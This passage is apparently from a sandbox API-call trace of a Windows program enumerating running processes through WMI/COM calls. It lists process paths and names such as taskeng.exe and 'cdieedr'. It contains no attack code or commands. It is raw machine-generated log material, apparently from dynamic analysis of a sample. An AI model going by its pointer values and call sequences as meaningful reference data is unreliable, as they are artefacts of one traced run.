[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632578) returned 0x0 [0214.973] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632578, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.973] WbemDefPath:IUnknown:Release (This=0x5632578) returned 0x3 [0214.973] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.974] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.974] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.974] WbemDefPath:IUnknown:Release (This=0x5638a60) returned 0x2 [0214.974] WbemDefPath:IUnknown:Release (This=0x5638a60) returned 0x1 [0214.974] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.974] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.974] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638a60, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638a60) returned 0x0 [0214.974] WbemDefPath:IUnknown:AddRef (This=0x5638a60) returned 0x3 [0214.974] WbemDefPath:IUnknown:Release (This=0x5638a60) returned 0x2 [0214.974] WbemDefPath:IWbemPath:SetText (This=0x5638a60, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3768\"") returned 0x0 [0214.974] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.974] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.974] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.974] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.974] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.974] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.974] IWbemClassObject:Get (in: This=0x5637130, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26a0660*=0, plFlavor=0x26a0664*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskeng.exe", varVal2=0x0), pType=0x26a0660*=8, plFlavor=0x26a0664*=0) returned 0x0 [0214.974] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0214.974] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0214.974] IWbemClassObject:Get (in: This=0x5637130, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26a0660*=8, plFlavor=0x26a0664*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskeng.exe", varVal2=0x0), pType=0x26a0660*=8, plFlavor=0x26a0664*=0) returned 0x0 [0214.975] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0214.975] SysStringByteLen (bstr="taskeng.exe") returned 0x16 [0214.975] CoTaskMemAlloc (cb=0x4) returned 0x56325a8 [0214.975] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56325a8, puReturned=0x267acc0 | out: apObjects=0x56325a8*=0x56372c8, puReturned=0x267acc0*=0x1) returned 0x0 [0214.976] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x56372c8) returned 0x0 [0214.976] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.976] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.976] IUnknown:AddRef (This=0x56372c8) returned 0x3 [0214.976] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.976] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.976] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x56372cc) returned 0x0 [0214.976] IMarshal:GetUnmarshalClass (in: This=0x56372cc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.976] IUnknown:Release (This=0x56372cc) returned 0x3 [0214.976] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.977] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.977] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.977] IUnknown:Release (This=0x56372c8) returned 0x2 [0214.977] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.977] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.977] IUnknown:QueryInterface (in: This=0x56372c8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x56372c8) returned 0x0 [0214.977] IUnknown:AddRef (This=0x56372c8) returned 0x4 [0214.977] IUnknown:Release (This=0x56372c8) returned 0x3 [0214.977] IUnknown:Release (This=0x56372c8) returned 0x2 [0214.977] CoTaskMemFree (pv=0x56325a8) [0214.977] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.977] IUnknown:AddRef (This=0x56372c8) returned 0x3 [0214.977] IWbemClassObject:Get (in: This=0x56372c8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.977] IWbemClassObject:Get (in: This=0x56372c8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3808\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.978] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3808\"") returned 0x66 [0214.978] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3808\"") returned 0x66 [0214.978] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.978] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.978] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.978] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.978] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56325a8) returned 0x0 [0214.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x56325a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.979] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56325a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638b40) returned 0x0 [0214.979] WbemDefPath:IUnknown:Release (This=0x56325a8) returned 0x0 [0214.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638b40) returned 0x0 [0214.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.979] WbemDefPath:IUnknown:AddRef (This=0x5638b40) returned 0x3 [0214.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.979] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56325b8) returned 0x0 [0214.980] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56325b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.980] WbemDefPath:IUnknown:Release (This=0x56325b8) returned 0x3 [0214.980] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.980] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.980] WbemDefPath:IUnknown:Release (This=0x5638b40) returned 0x2 [0214.980] WbemDefPath:IUnknown:Release (This=0x5638b40) returned 0x1 [0214.980] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.980] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.980] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638b40, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638b40) returned 0x0 [0214.980] WbemDefPath:IUnknown:AddRef (This=0x5638b40) returned 0x3 [0214.980] WbemDefPath:IUnknown:Release (This=0x5638b40) returned 0x2 [0214.980] WbemDefPath:IWbemPath:SetText (This=0x5638b40, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3808\"") returned 0x0 [0214.980] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.980] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.980] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.980] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.980] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.980] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.980] IWbemClassObject:Get (in: This=0x56372c8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26a0ed8*=0, plFlavor=0x26a0edc*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cdieedr", varVal2=0x0), pType=0x26a0ed8*=8, plFlavor=0x26a0edc*=0) returned 0x0 [0214.980] SysStringByteLen (bstr="cdieedr") returned 0xe [0214.980] SysStringByteLen (bstr="cdieedr") returned 0xe [0214.981] IWbemClassObject:Get (in: This=0x56372c8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26a0ed8*=8, plFlavor=0x26a0edc*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cdieedr", varVal2=0x0), pType=0x26a0ed8*=8, plFlavor=0x26a0edc*=0) returned 0x0 [0214.981] SysStringByteLen (bstr="cdieedr") returned 0xe [0214.981] SysStringByteLen (bstr="cdieedr") returned 0xe [0214.981] CoTaskMemAlloc (cb=0x4) returned 0x5642700 [0214.981] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642700, puReturned=0x267acc0 | out: apObjects=0x5642700*=0x5637460, puReturned=0x267acc0*=0x1) returned 0x0 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5637460) returned 0x0 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.982] IUnknown:AddRef (This=0x5637460) returned 0x3 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5637464) returned 0x0 [0214.982] IMarshal:GetUnmarshalClass (in: This=0x5637464, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.982] IUnknown:Release (This=0x5637464) returned 0x3 [0214.982] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.982] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.982] IUnknown:Release (This=0x5637460) returned 0x2 [0214.982] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.982] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.982] IUnknown:QueryInterface (in: This=0x5637460, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5637460) returned 0x0 [0214.983] IUnknown:AddRef (This=0x5637460) returned 0x4 [0214.983] IUnknown:Release (This=0x5637460) returned 0x3 [0214.983] IUnknown:Release (This=0x5637460) returned 0x2 [0214.983] CoTaskMemFree (pv=0x5642700) [0214.983] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.983] IUnknown:AddRef (This=0x5637460) returned 0x3 [0214.983] IWbemClassObject:Get (in: This=0x5637460, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.983] IWbemClassObject:Get (in: This=0x5637460, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3868\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.983] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3868\"") returned 0x66 [0214.983] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3868\"") returned 0x66 [0214.983] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.983] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.984] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.984] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.984] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5642700) returned 0x0 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642700, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.985] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642700, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638c20) returned 0x0 [0214.985] WbemDefPath:IUnknown:Release (This=0x5642700) returned 0x0 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638c20, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638c20) returned 0x0 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638c20, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.985] WbemDefPath:IUnknown:AddRef (This=0x5638c20) returned 0x3 [0214.985] WbemDefPath:IUnknown:QueryInterface (in: 